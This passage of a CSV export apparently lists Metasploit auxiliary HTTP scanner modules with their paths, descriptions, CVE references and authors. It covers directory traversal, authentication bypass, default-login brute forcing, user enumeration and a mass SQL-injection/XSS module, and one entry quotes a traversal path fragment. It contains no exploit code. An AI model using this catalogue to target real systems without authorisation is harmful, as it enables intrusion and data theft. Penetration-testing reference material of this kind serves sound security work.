It is not recommended to set FILE when doing scans across a group of servers where the OS may vary; otherwise, the file requested may not make sense for the OS","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-42342, CVE-2010-2861, OSVDB-67047, URL-http://www.adobe.com/support/security/bulletins/apsb10-18.html, URL-http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861, URL-http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07","CG , nebulus" 1467,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/concrete5_member_list.rb","auxiliary","scanner/http/concrete5_member_list","auxiliary/scanner/http/concrete5_member_list","Concrete5 Member List Enumeration",300,"This module extracts username information from the Concrete5 member page","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc, URL-http://www.concrete5.org, URL-http://www.concrete5.org/documentation/using-concrete5/dashboard/users-and-groups/","Chris John Riley" 1468,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/copy_of_file.rb","auxiliary","scanner/http/copy_of_file","auxiliary/scanner/http/copy_of_file","HTTP Copy File Scanner",300,"This module identifies the existence of possible copies of a specific file in a given path.","BSD License","f",,,,"aggressive","t",,"et " 1469,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/crawler.rb","auxiliary","scanner/http/crawler","auxiliary/scanner/http/crawler","Web Site Crawler",300,"Crawl a web site and store information about what was found","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , tasos" 1470,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dell_idrac.rb","auxiliary","scanner/http/dell_idrac","auxiliary/scanner/http/dell_idrac","Dell iDRAC default Login",300,"This module attempts to login to a iDRAC webserver 
instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Cristiano Maruti " 1471,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dir_listing.rb","auxiliary","scanner/http/dir_listing","auxiliary/scanner/http/dir_listing","HTTP Directory Listing Scanner",300,"This module identifies directory listing vulnerabilities in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1472,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dir_scanner.rb","auxiliary","scanner/http/dir_scanner","auxiliary/scanner/http/dir_scanner","HTTP Directory Scanner",300,"This module identifies the existence of interesting directories in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1473,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb","auxiliary","scanner/http/dir_webdav_unicode_bypass","auxiliary/scanner/http/dir_webdav_unicode_bypass","MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner",300,"This module is based on et's HTTP Directory Scanner module, with one exception. Where authentication is required, it attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. 
The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-34993, CVE-2009-1122, CVE-2009-1535, MSB-MS09-020, OSVDB-54555","patrick " 1474,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb","auxiliary","scanner/http/dlink_dir_300_615_http_login","auxiliary/scanner/http/dlink_dir_300_615_http_login","DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility",300,"This module attempts to authenticate to different DLink HTTP management services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615 Hardware revision D and D-Link DIR-320 devices. It is possible that this module also works with other models.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Michael Messner , hdm " 1475,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb","auxiliary","scanner/http/dlink_dir_615h_http_login","auxiliary/scanner/http/dlink_dir_615h_http_login","DLink DIR-615H HTTP Login Utility",300,"This module attempts to authenticate to different DLink HTTP management services. It has been tested successfully on D-Link DIR-615 Hardware revision H devices. It is possible that this module also works with other models.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Michael Messner , hdm " 1476,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb","auxiliary","scanner/http/dlink_dir_session_cgi_http_login","auxiliary/scanner/http/dlink_dir_session_cgi_http_login","DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility",300,"This module attempts to authenticate to different DLink HTTP management services. 
It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices.It is possible that this module also works with other models.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Michael Messner , hdm " 1477,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dolibarr_login.rb","auxiliary","scanner/http/dolibarr_login","auxiliary/scanner/http/dolibarr_login","Dolibarr ERP & CRM 3 Login Utility",300,"This module attempts to authenticate to a Dolibarr ERP/CRM's admin web interface, and should only work against version 3.1.1 or older, because these versions do not have any default protections against bruteforcing.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"sinn3r " 1478,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/drupal_views_user_enum.rb","auxiliary","scanner/http/drupal_views_user_enum","auxiliary/scanner/http/drupal_views_user_enum","Drupal Views Module Users Enumeration",300,"This module exploits an information disclosure vulnerability in the 'Views' module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'","Metasploit Framework License (BSD)","f","2010-07-02 00:00:00",,,"aggressive","t","URL-http://www.madirish.net/node/465","Brandon McCann ""zeknox"" , Justin Klein Keane, Robin Francois " 1479,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/ektron_cms400net.rb","auxiliary","scanner/http/ektron_cms400net","auxiliary/scanner/http/ektron_cms400net","Ektron CMS400.NET Default Password Scanner",300,"Ektron CMS400.NET is a web content management system based on .NET. This module tests for installations that are utilizing default passwords set by the vendor. Additionally, it has the ability to brute force user accounts. 
Note that Ektron CMS400.NET, by default, enforces account lockouts for regular user account after a number of failed attempts.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Justin Cacak" 1480,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/enum_wayback.rb","auxiliary","scanner/http/enum_wayback","auxiliary/scanner/http/enum_wayback","Archive.org Stored Domain URLs",300,"This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"mubix " 1481,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/error_sql_injection.rb","auxiliary","scanner/http/error_sql_injection","auxiliary/scanner/http/error_sql_injection","HTTP Error Based SQL Injection Scanner",300,"This module identifies the existence of Error Based SQL injection issues. Still requires alot of work","BSD License","f",,,,"aggressive","t",,"et " 1482,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/file_same_name_dir.rb","auxiliary","scanner/http/file_same_name_dir","auxiliary/scanner/http/file_same_name_dir","HTTP File Same Name Directory Scanner",300,"This module identifies the existence of files in a given directory path named as the same name of the directory. 
Only works if PATH is differenet than '/'.","BSD License","f",,,,"aggressive","t",,"et " 1483,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/files_dir.rb","auxiliary","scanner/http/files_dir","auxiliary/scanner/http/files_dir","HTTP Interesting File Scanner",300,"This module identifies the existence of interesting files in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1484,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/frontpage_login.rb","auxiliary","scanner/http/frontpage_login","auxiliary/scanner/http/frontpage_login","FrontPage Server Extensions Anonymous Login Scanner",300,"This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Microsoft_FrontPage, URL-http://msdn2.microsoft.com/en-us/library/ms454298.aspx","Matteo Cantoni " 1485,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/glassfish_login.rb","auxiliary","scanner/http/glassfish_login","auxiliary/scanner/http/glassfish_login","GlassFish Brute Force Utility",300,"This module attempts to login to GlassFish instance using username and password combindations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-0807, OSVDB-71948","Joshua Abraham " 1486,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb","auxiliary","scanner/http/groupwise_agents_http_traversal","auxiliary/scanner/http/groupwise_agents_http_traversal","Novell Groupwise Agents HTTP Directory Traversal",300,"This module exploits a directory traversal vulnerability in Novell Groupwise. The vulnerability exists in the web interface of both the Post Office and the MTA agents. 
This module has been tested successfully on Novell Groupwise 8.02 HP2 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55648, CVE-2012-0419, OSVDB-85801, URL-http://www.novell.com/support/kb/doc.php?id=7010772","juan vazquez , r () b13$" 1487,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb","auxiliary","scanner/http/hp_imc_faultdownloadservlet_traversal","auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal","HP Intelligent Management FaultDownloadServlet Directory Traversal",300,"This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the FaultDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58675, CVE-2012-5202, OSVDB-91027, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-051/","juan vazquez , rgod " 1488,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb","auxiliary","scanner/http/hp_imc_ictdownloadservlet_traversal","auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal","HP Intelligent Management IctDownloadServlet Directory Traversal",300,"This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the IctDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. 
This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58676, CVE-2012-5204, OSVDB-91029, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-053/","juan vazquez , rgod " 1489,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb","auxiliary","scanner/http/hp_imc_reportimgservlt_traversal","auxiliary/scanner/http/hp_imc_reportimgservlt_traversal","HP Intelligent Management ReportImgServlt Directory Traversal",300,"This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the ReportImgServlt, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58672, CVE-2012-5203, OSVDB-91028, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-052/","juan vazquez , rgod " 1490,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb","auxiliary","scanner/http/hp_sitescope_getfileinternal_fileaccess","auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess","HP SiteScope SOAP Call getFileInternal Remote File Access",300,"This module exploits an authentication bypass vulnerability in HP SiteScope to retrieve an arbitrary file from the remote server. It is accomplished by calling the getFileInternal operation available through the APISiteScopeImpl AXIS service. 
This module has been successfully tested on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos 6.3.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55269, OSVDB-85119, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-176/","juan vazquez , rgod " 1491,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb","auxiliary","scanner/http/hp_sitescope_getsitescopeconfiguration","auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration","HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access",300,"This module exploits an authentication bypass vulnerability in HP SiteScope which allows to retrieve the HP SiteScope configuration, including administrative credentials. It is accomplished by calling the getSiteScopeConfiguration operation available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration is retrieved as file containing Java serialization data. This module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos 6.3.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55269, OSVDB-85120, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-173/","juan vazquez , rgod " 1492,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb","auxiliary","scanner/http/hp_sitescope_loadfilecontent_fileaccess","auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess","HP SiteScope SOAP Call loadFileContent Remote File Access",300,"This module exploits an authentication bypass vulnerability in HP SiteScope to retrieve an arbitrary text file from the remote server. It is accomplished by calling the loadFileContent operation available through the APIMonitorImpl AXIS service. 
This module has been successfully tested on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos 6.3.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55269, OSVDB-85118, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-177/","juan vazquez , rgod " 1493,"2013-05-24 08:19:45","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_hsts.rb","auxiliary","scanner/http/http_hsts","auxiliary/scanner/http/http_hsts","HTTP Strict Transport Security (HSTS) Detection",300,"Display HTTP Strict Transport Security (HSTS) information about each system.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Matt ""hostess"" Andreko " 1494,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_login.rb","auxiliary","scanner/http/http_login","auxiliary/scanner/http/http_login","HTTP Login Utility",300,"This module attempts to authenticate to an HTTP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","hdm " 1495,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_put.rb","auxiliary","scanner/http/http_put","auxiliary/scanner/http/http_put","HTTP Writable Path PUT/DELETE File Access",300,"This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE. PUT is the default. If filename isn't specified, the module will generate a random string for you as a .txt file. 
If DELETE is used, a filename is required.","Metasploit Framework License (BSD)","f",,,"PUT","aggressive","t","OSVDB-397","CG , Kashif , sinn3r " 1496,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_traversal.rb","auxiliary","scanner/http/http_traversal","auxiliary/scanner/http/http_traversal","Generic HTTP Directory Traversal Utility",300,"This module allows you to test if a web server (or web application) is vulnerable to directory traversal with three different actions. The 'CHECK' action (default) is used to automatically (or manually) find if directory traversal exists in the web server, and then return the path that triggers the vulnerability. The 'DOWNLOAD' action shares the same ability as 'CHECK', but will take advantage of the found trigger to download files based on a 'FILELIST' of your choosing. The 'PHPSOURCE' action can be used to download source against PHP applications. The 'WRITABLE' action can be used to determine if the trigger can be used to write files outside the www directory. 
To use the 'COOKIE' option, set your value like so: ""name=value"".","Metasploit Framework License (BSD)","f",,,"CHECK","aggressive","t",,"Ewerson Guimaraes(Crash) , Michael Messner , et , sinn3r " 1497,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_version.rb","auxiliary","scanner/http/http_version","auxiliary/scanner/http/http_version","HTTP Version Detection",300,"Display version information about each system","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1498,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/httpbl_lookup.rb","auxiliary","scanner/http/httpbl_lookup","auxiliary/scanner/http/httpbl_lookup","Http:BL Lookup",300,"This module can be used to enumerate information about an IP addresses from Project HoneyPot's HTTP Block List.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.projecthoneypot.org/httpbl_api.php","mubix " 1499,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/iis_internal_ip.rb","auxiliary","scanner/http/iis_internal_ip","auxiliary/scanner/http/iis_internal_ip","Microsoft IIS HTTP Internal IP Disclosure",300,"Collect any leaked internal IPs by requesting commonly redirected locs from IIS.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Heather Pilkington" 1500,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/jboss_vulnscan.rb","auxiliary","scanner/http/jboss_vulnscan","auxiliary/scanner/http/jboss_vulnscan","JBoss Vulnerability Scanner",300,"This module scans a JBoss instance for a few vulnerablities.","BSD License","f",,,,"aggressive","t","CVE-2010-0738","Tyler Krpata" 1501,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/joomla_pages.rb","auxiliary","scanner/http/joomla_pages","auxiliary/scanner/http/joomla_pages","Joomla Page Scanner",300,"This module scans a Joomla install for common 
pages.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"newpid0" 1502,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/joomla_plugins.rb","auxiliary","scanner/http/joomla_plugins","auxiliary/scanner/http/joomla_plugins","Joomla Plugins Scanner",300,"This module scans a Joomla install for plugins and potential vulnerabilities.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"newpid0" 1503,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/joomla_version.rb","auxiliary","scanner/http/joomla_version","auxiliary/scanner/http/joomla_version","Joomla Version Scanner",300,"This module scans a Joomla install for information about the underlying operating system and Joomla version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"newpid0" 1504,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb","auxiliary","scanner/http/linksys_e1500_traversal","auxiliary/scanner/http/linksys_e1500_traversal","Linksys E1500 Directory Traversal Vulnerability",300,"This module exploits a directory traversal vulnerability which is present in different Linksys home routers, like the E1500.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-57760, EDB-24475, OSVDB-89911, URL-http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml, URL-http://www.s3cur1ty.de/m1adv2013-004","Michael Messner " 1505,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb","auxiliary","scanner/http/litespeed_source_disclosure","auxiliary/scanner/http/litespeed_source_disclosure","LiteSpeed Source Code Disclosure/Download",300,"This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed.","Metasploit Framework License 
(BSD)","f",,,,"aggressive","t","BID-40815, CVE-2010-2333, EDB-13850, OSVDB-65476","Kingcope, xanda" 1506,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/lucky_punch.rb","auxiliary","scanner/http/lucky_punch","auxiliary/scanner/http/lucky_punch","HTTP Microsoft SQL Injection Table XSS Infection",300,"This module implements the mass SQL injection attack in use lately by concatenation of HTML string that forces a persistant XSS attack to redirect user browser to a attacker controller website.","BSD License","f",,,,"aggressive","t",,"et " 1507,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb","auxiliary","scanner/http/majordomo2_directory_traversal","auxiliary/scanner/http/majordomo2_directory_traversal","Majordomo2 _list_file_get() Directory Traversal",300,"This module exploits a directory traversal vulnerability present in the _list_file_get() function of Majordomo2 (help function). By default, this module will attempt to download the Majordomo config.pl file.","Metasploit Framework License (BSD)","f","2011-03-08 00:00:00",,,"aggressive","t","CVE-2011-0049, CVE-2011-0063, EDB-16103, OSVDB-70762, URL-http://sotiriu.de/adv/NSOADV-2011-003.txt, URL-https://sitewat.ch/en/Advisory/View/1","Nikolas Sotiriu" 1508,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb","auxiliary","scanner/http/manageengine_deviceexpert_traversal","auxiliary/scanner/http/manageengine_deviceexpert_traversal","ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal",300,"This module exploits a directory traversal vulnerability found in ManageEngine DeviceExpert's ScheduleResultViewer Servlet. This is done by using ""..\..\..\..\..\..\..\..\..\..\"" in the path in order to retrieve a file on a vulnerable machine. 
Please note that the SSL option is required in order to send HTTP requests.","Metasploit Framework License (BSD)","f","2012-03-18 00:00:00",,,"aggressive","t","OSVDB-80262, URL-http://retrogod.altervista.org/9sg_me_adv.htm","rgod, sinn3r " 1509,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb","auxiliary","scanner/http/manageengine_securitymanager_traversal","auxiliary/scanner/http/manageengine_securitymanager_traversal","ManageEngine SecurityManager Plus 5.5 Directory Traversal",300,"This module exploits a directory traversal flaw found in ManageEngine SecurityManager Plus 5.5 or less. When handling a file download request, the DownloadServlet class fails to properly check the 'f' parameter, which can be abused to read any file outside the virtual directory.","Metasploit Framework License (BSD)","f","2012-10-19 00:00:00",,,"aggressive","t","EDB-22092, OSVDB-86563","blkhtc0rp, sinn3r " 1510,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb","auxiliary","scanner/http/mediawiki_svg_fileaccess","auxiliary/scanner/http/mediawiki_svg_fileaccess","MediaWiki SVG XML Entity Expansion Remote File Access",300,"This module attempts to read a remote file from the server using a vulnerability in the way MediaWiki handles SVG files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. In order to work MediaWiki must be configured to accept upload of SVG files. If anonymous uploads are allowed the username and password aren't required, otherwise they are. This module has been tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10. Older versions were also tested but do not seem to be vulnerable to this vulnerability. 
The following MediaWiki requirements must be met: File upload must be enabled, $wgFileExtensions[] must include 'svg', $wgSVGConverter must be set to something other than 'false'.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-92490, URL-http://www.gossamer-threads.com/lists/wiki/mediawiki-announce/350229, URL-https://bugzilla.wikimedia.org/show_bug.cgi?id=46859","Christian Mehlmauer, Daniel Franke, juan vazquez " 1511,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/mod_negotiation_brute.rb","auxiliary","scanner/http/mod_negotiation_brute","auxiliary/scanner/http/mod_negotiation_brute","Apache HTTPD mod_negotiation Filename Bruter",300,"This module performs a brute force attack in order to discover existing files on a server which uses mod_negotiation. If the filename is found, the IP address and the files found will be displayed.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"diablohorn " 1512,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb","auxiliary","scanner/http/mod_negotiation_scanner","auxiliary/scanner/http/mod_negotiation_scanner","Apache HTTPD mod_negotiation Scanner",300,"This module scans the webserver of the given host(s) for the existence of mod_negotiate. If the webserver has mod_negotiation enabled, the IP address will be displayed.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"diablohorn " 1513,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb","auxiliary","scanner/http/ms09_020_webdav_unicode_bypass","auxiliary/scanner/http/ms09_020_webdav_unicode_bypass","MS09-020 IIS6 WebDAV Unicode Authentication Bypass",300,"This module attempts to to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. 
The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-34993, CVE-2009-1122, CVE-2009-1535, MSB-MS09-020, OSVDB-54555","et , patrick " 1514,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/netdecision_traversal.rb","auxiliary","scanner/http/netdecision_traversal","auxiliary/scanner/http/netdecision_traversal","NetDecision NOCVision Server Directory Traversal",300,"This module exploits a directory traversal bug in NetDecision's TrafficGrapherServer.exe service. This is done by using ""...\"" in the path to retrieve a file on a vulnerable machine.","Metasploit Framework License (BSD)","f","2012-03-07 00:00:00",,,"aggressive","t","OSVDB-79863, URL-http://aluigi.altervista.org/adv/netdecision_1-adv.txt","Luigi Auriemma, sinn3r " 1515,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb","auxiliary","scanner/http/netgear_sph200d_traversal","auxiliary/scanner/http/netgear_sph200d_traversal","Netgear SPH200D Directory Traversal Vulnerability",300,"This module exploits a directory traversal vulnerablity which is present in Netgear SPH200D Skype telephone.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-57660, EDB-24441, URL-http://support.netgear.com/product/SPH200D, URL-http://www.s3cur1ty.de/m1adv2013-002","Michael Messner " 1516,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/nginx_source_disclosure.rb","auxiliary","scanner/http/nginx_source_disclosure","auxiliary/scanner/http/nginx_source_disclosure","Nginx Source Code Disclosure/Download",300,"This module exploits a source code disclosure/download vulnerability in versions 0.7 and 0.8 of the nginx web server. 
Versions 0.7.66 and 0.8.40 correct this vulnerability.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-40760, CVE-2010-2263, EDB-13818, EDB-13822, OSVDB-65531","Alligator Security Team, Tiago Ferreira " 1517,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb","auxiliary","scanner/http/novell_file_reporter_fsfui_fileaccess","auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess","NFR Agent FSFUI Record Arbitrary Remote File Access",300,"NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary text files via a directory traversal while handling requests to /FSF/CMD with an FSFUI record with UICMD 126. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",,,"aggressive","t","CVE-2012-4958, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1518,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb","auxiliary","scanner/http/novell_file_reporter_srs_fileaccess","auxiliary/scanner/http/novell_file_reporter_srs_fileaccess","NFR Agent SRS Record Arbitrary Remote File Access",300,"NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and CMD 103, specifying a full pathname. 
This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",,,"aggressive","t","CVE-2012-4957, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1519,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/open_proxy.rb","auxiliary","scanner/http/open_proxy","auxiliary/scanner/http/open_proxy","HTTP Open Proxy Detection",300,"Checks if an HTTP proxy is open. False positive are avoided verifing the HTTP return code and matching a pattern.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Open_proxy, URL-http://nmap.org/svn/scripts/http-open-proxy.nse","Matteo Cantoni " 1520,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/options.rb","auxiliary","scanner/http/options","auxiliary/scanner/http/options","HTTP Options Detection",300,"Display available HTTP options for each system","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-11604, BID-9506, BID-9561, CVE-2005-3398, CVE-2005-3498, OSVDB-877","CG " 1521,"2013-05-07 